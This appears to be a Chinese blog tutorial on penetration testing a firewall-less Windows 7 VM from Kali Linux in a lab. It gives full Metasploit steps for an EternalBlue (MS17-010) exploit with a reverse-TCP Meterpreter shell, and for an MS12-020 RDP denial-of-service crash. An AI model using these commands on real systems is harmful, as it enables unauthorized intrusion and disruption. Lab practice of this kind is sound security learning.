
论如何用Kali Linux入侵无防火墙的Windows7
论如何用Kali Linux入侵无防火墙的Windows 7
文章目录
- 声明
- VMware下载
- 虚拟机配置
- Kali Linux
- Kali Linux简介
- Kali Linux配置
- Windows7
- Windows7简介
- Windows7配置
- 网络配置
- 开始渗透
- 网络扫描
- 永恒之蓝
- 永恒之蓝攻击
- 死亡蓝屏
- 死亡蓝屏攻击
声明
本文只做教学作用,禁止以此文章做违法的事。
VMware下载
VMware是一款强大的虚拟机软件,支持安装多种系统
VMware官网的安装包暂时没找到,可以直接360软件管家下载。
点击安装,等待启动安装包
这边路径可以更改一下
然后一直下一步,最后安装
虚拟机配置
Kali Linux
Kali Linux简介
Kali Linux是基于Debian的Linux发行版。它被设计为用于数字取证的操作系统,每一季度更新一次。由Offensive Security(OffSec)维护和资助。最早是由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,而BackTrack也是他们之前编写的用于取证的Linux发行版。Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng等。用户可通过硬盘、Live CD或Live USB运行Kali Linux。Kali Linux既有32位和64位的镜像,可用于x86 指令集的平台。同时还有基于ARM架构的镜像,可用于树莓派和ARM系统。
Kali Linux配置
首先,进入Kali Linux官网
点击Download
点击
点击VMware进行下载,下载后会得到一个kali的压缩包,我们解压,然后打开VMware
,点击打开虚拟机
找到文件夹,找到以.vmx
结尾的文件,打开
然后启动虚拟机,点击开启此虚拟机
等待启动
注意:kali默认用户名为kali,密码为kali
因为我的kali是调过的,所以是中文的,要更改的话,就打开终端,输入以下指令
┌──(kali㉿kali)-[~]
└─$ sudo dpkg-reconfigure locales
我们往下整,找到[ ] zh_CN.UTF-8 UTF-8
,然后按空格,回车
然后选择最后一个,回车
等待一会儿,输入
┌──(kali㉿kali)-[~]
└─$ reboot
重启,然后选择是,就好了
Windows7
Windows7简介
Windows 7 是由微软公司(Microsoft)2009年10月22日发布的桌面端操作系统,内核版本号为Windows NT 6.1,开发代号: Vienna,后期命名为“7 ”。 Windows 7 于2009年7月22 日发放给原始设备制造商(OEM),零售版于 2009年10月22日在中国大陆及中国台湾发布。
Windows 7 可供家庭及商业工作环境的笔记本电脑、多媒体中心等使用。 Windows 7 继承了包括Aero风格等多项功能,并且在此基础上增添了其他功能。
Windows 7 发布于2009年10月,2015年结束主流支持,2020年结束外延支持, 随后微软上线了 ESU, 允许通过付费的方式订阅安全补丁,2023年1 月10日, Windows 7 操作系统结束 ESU (付费外延扩展支持)。
Windows7配置
打开MSDN,点击操作系统
=>Windows 7
=>中文 - 简体
=>Windows 7 Ultimate (x64) - DVD (Chinese-Simplified)
,然后点击详细信息,将发布信息下面的代码复制下来,用迅雷下载下来。
下载完之后,打开VMware,点击创建新的虚拟机,点下一步,点击稍后安装操作系统,点下一步,客户机操作系统选择Microsoft Windows
,版本选择Windows 7 x64
,点下一步,然后命名和路径自己选,点下一步,默认就好,点下一步,点完成,就可以了。
然后点击编辑虚拟机设置,找到CD/DVD (SATA)
将将连接改为使用ISO映像文件
,然后选择刚才下载的ISO文件,启动虚拟机,自己安装,我这里就不演示了。注意:网络选择公用网络,然后把防火墙关掉
网络配置
编辑虚拟机配置
=>网络适配器
=>自定义(U):特定虚拟网络
,选择VMnet1(仅主机模式)(记得两台虚拟机都是这个)
开始渗透
网络扫描
首先,我们打开终端,输入以下指令
┌──(kali㉿kali)-[~]
└─$ ip a
第二个eth0下面有两个ip,后面跟着/24的就是我们的
然后输入
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.237.0/24 #后面的ip是自己的ip,把最后的数字改成0/24
此时目标靶机应该是开着的
然后咱们找不是以0、1、254、255结尾的ip
接着,我们用nmap扫描一下
┌──(kali㉿kali)-[~]
└─$ sudo nmap 192.168.237.129 -O
此时防火墙一定要关,不然扫不出来
#扫描结果
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 03:13 EDT
Nmap scan report for 192.168.237.129
Host is up (0.0014s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:00:7B:5E (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.50 seconds
然后,我们把目光移动到445端口和3389端口上
永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝攻击
首先,我们启动msf6
┌──(kali㉿kali)-[~]
└─$ msfconsole
然后,输入
msf6 > search ms17_010 #永恒之蓝代号为ms17_010
msf6 > use 24
这样就会启用到永恒之蓝的漏洞扫描模块,我们看一下它的参数
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
可以看到,我们目前需要设置RHOSTS
,也就是目标ip,我们设置一下
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.237.129
接下来,输入run
进行扫描
如果有这个漏洞,那么
接下来,输入back
,然后搜索(search
)ms17_010,利用(use
)0,查看参数(options
),设置参数(set
)
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set rhost 192.168.3.40 #这里中途换了个网络
然后,run
,出现meterpreter
的时候,你就成功了!
死亡蓝屏
死亡蓝屏ms12_020,可以让受害者电脑一秒蓝屏
死亡蓝屏攻击
启动msf6,然后查找模块
msf6 > search ms12_020
msf6 > use 0
msf6 auxiliary(scanner/rdp/ms12_020_maxchannelids) >
然后设置参数,查看是否有没有这个漏洞,如果有,那么
msf6 auxiliary(scanner/rdp/ms12_020_maxchannelids) > back
msf6 > search ms12_020
msf6 > use 1
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > options
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.3.40
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
更多推荐
所有评论(0)